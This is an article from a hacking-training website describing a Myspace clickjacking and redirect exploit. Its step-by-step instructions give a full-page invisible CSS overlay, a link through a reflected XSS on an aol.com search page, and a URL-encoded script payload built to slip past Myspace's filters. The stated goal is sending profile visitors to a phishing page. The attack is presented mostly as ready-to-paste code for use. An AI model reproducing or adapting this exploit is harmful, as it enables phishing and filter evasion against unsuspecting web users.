EG Information
Training Missions
Knowledge Bank
Pimp Us Out!
Has Enigma Group Helped You? Then Help Us By Advertising For Us. Place One Of The Following Images On Your Site And Create A Link Back To Enigma Group.
|
| |
Affiliates
|
|
Enigma Group's Articles
Return to Category Selection
Myspace ClickJacking/Redirect Exploit - Submitted By: Raze 2010-04-28 23:14:46
This is an exploit I found a while ago in myspace.com (still works as of 4/28/2010) that allows you to redirect anyone who visits your profile to any page you want w/o the myspace phishing filter popping up.
Requirements: - Myspace Account with Profile 2.0 enabled - An XSS in a trusted site (aol.com is full of them) - A phishing page
Step 1: Placing the evil CSS Click on Profile->Customize Profile. Once there click the CSS editor tab and put in this code:
.hax { width: 100000px; height: 10000px; position: absolute; top: 0px; left: 0px; }
Step 2: Place the evil image To bypass some filters myspace has we need to use an image instead of an <a href> tag with the exploit. Simply place this code into your profile:
<a href="[ trusted link with xss here ]"> <img src="http://doesntexist.com/nothing.jpg" class="hax" /> </a>
For the trusted link we can use this public xss:
http://cnn.search.aol.com/aol/weboffers?invocationType=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&query=query1
and just edit the code like so:
http://cnn.search.aol.com/aol/weboffers?invocationType="><script>window.location='http://google.com'</script>&query=query1 (Just be sure to URL encode the code so myspaces filters don't catch the script tags)
Our final exploit code for our About Me section is:
<a href="http://cnn.search.aol.com/aol/weboffers?invocationType=%22%3E%3Cscript%3Ewindow.location%3D%27http%3A%2f%2fgoogle.com%27%3C%2fscript%3E&query=query"> <img src="http://doesntexist.com/nothing.jpg" class="hax" /> </a>
Now if anyone clicks on your profile they will be redirected to the trusted page (bypassing any xss filters provided by myspace) which in turn redirects them to the phishing page (or in this case google.com).
Do not re-publish this without my permission first please. Written by Raze 4/28/2010 Return to Category Selection
If you wish to submit a comment, you must be a registered member and logged in. Login or Register.
Return to Category Selection
|
| |
|
|
Who Visited EnigmaGroup Today?
1507 Guests, 297 Users (195 Spiders)
voliveita, g3nu1n3, rulebreaker, Abhinav2107, ideriouro, litbk, BlAd373, CreedoFiegree, Distorted, ant0601, nmobin27, myfabregas, spartanvedicrishi, DrOptix, saraf, VireekadiaFap, obencefoozy, memoryshot, mongrel88, drag0n, Kearstin29, alexelixir, r0z4, theanonymous21, greatg, bivaEmilltite, posthuman01, Taireegaddita, Taicadine, c_a13, hizImmoli, scifics, slchill, KELATALFTUS, kynapse, Tonyui, Hackpad, Epilioptiop, Mamorite, IodindDog, brunoriversyhn, Effomeidonize, ReottphoffBom, arktek, burgeoningneophyte, TradaGreant, SlayingDragons, Waldlyeps, Arsenal, CJ_Omaha, Ryuske, thethird3y3, todayadvila, pwnpwnlolz, NeetaexomYgom, ookami-namikaze, dot_Cipher, Unotohumsmush, SaubymorRoyab, loltyg, Ausome1, Rik, hrangel, cyber-guard, Meonkzt, mori, 31415926, optioniLele, intorerse, FlifobbyFloks, Ios, Røgue, cossyDrybrich, IvanDimitriev, havisham, KIKNWING, fitz, fleeloCycle, hackboy302, strudels, CootoDorbeeft, gymnediny, hustleman9tv, comando300, Ysri13, thatoneguy, Paran0id, whoami, Pitanteerve, Reapon, cls777, Afrika, suetekh, somebody777, floontiny, Frudopvia, jasonbourne, zombiehack640, CloverCipher, spoosh, Fraubbova, dncjor, Fintyoptots, viRuleNt, NipPaineHainy, TheHarrisonW, Jamesgo, TheGanjator, psychomarine, 1421carter, tingle65, claudius, Feld Grau, Partisan, Gunslinger, gydeqqzpn, yshiau, Zaccarato, chromoSone, priovasashCor, ellisp, GothicLogic, keetone, M0rdak, UsedDeteKef, nhorton, archestraty, HatriteBeft, JC06dc5, alpha1, spg, dark_void, wakazi, mtroscheck, TheCheeseDemon, ach.n30, sahariar, hervelegeraf, Psiber_Syn, hackaday, Mod777, neompenly, pollolololo, SnoopSky, Cigmimifs, ProloG-Shaman, unicornrainbow, cheapnikeshoxog, bobsters, foofthoorgo, polemarchos, avacraft, spencerwilliams23, lotato, ryanjcrook, dollerolf, robintenboden, rospark, WexEmbet, BeefSupreme, Hessesian, whydoyoulook, cdpirate, DnA-Ender, CaNcEr, zheincnoob, Vengeance987, justforfun363, RawTeefecycle, Squissesk, aVoid, SaMTHG, neodude, Marion1p, Ops, ddxc, Klosse, khamhou, samsatHD80, PauffPubadvic, AnnaNoult, SexyCreerve, newb1, robster1977, Blizer, Dudleypagrove, Mr_KaLiMaN, FirewallPenetrator, GMo, Seasharp, mrchicken1, Zaxem, N4g4c3N, MaxMeier, Ian, sander.ashwin, Predatorc, lonely.connection, ElEnfermado, wavyd, dirkdanblue, cve916, kalak55, a1los, jell0, Exclaw, veceattainc, Muselele, Mr Pacifist, stylish007, zach, closednetwork99, soroimmuror, PlaneReaction, Wamemanytex38, DieAble, d0seN_36b, jeremy.whitson, lol, nefeolnb, Noticon, statix, anandoump, RomeoG, advilapyday, snorapa, Gkjt, autotuneuser, beanulpinee, 2142, kiklopas, door51, Pizza, deepakkumar, makler2004, M4rcy, Xargos, bdkoenig, Blavatsky, m4f10, Huasca, itsme, xu_lain, Nikhil, ChewBigRed, samxoxo, incicaMaidits, toudioria, Chidokage, Jigoku, cesecyclelm, schn1ffl3r, sam20000, learning, kentora, San Marino, Nightraven, zanydouner, FrofErrodslot, FatalEror, wheaties, akki, AlexDiru, unclejos666, override101, blink_212, uncowstientee, lilkpoigogs, Innonaenupt607, Killshot, ZheIncKnight, ActictGlync, acarseflalk, ___, trashsporn, Memartent, Zoorsornaks, z3z3, heyhey123, Ghajnm, usaliaPels, Ordeptpen, pelly, quellense, Szuba, lamb, x1rt4m, ToutousaRulty, vipervince2002, mannavard1611, BinaryShinigami, Duchdund, afgnumgt, Anatissa, darkfire1515, bennyblanco5000, Mmmett50 |
| |
|
|
|
|
|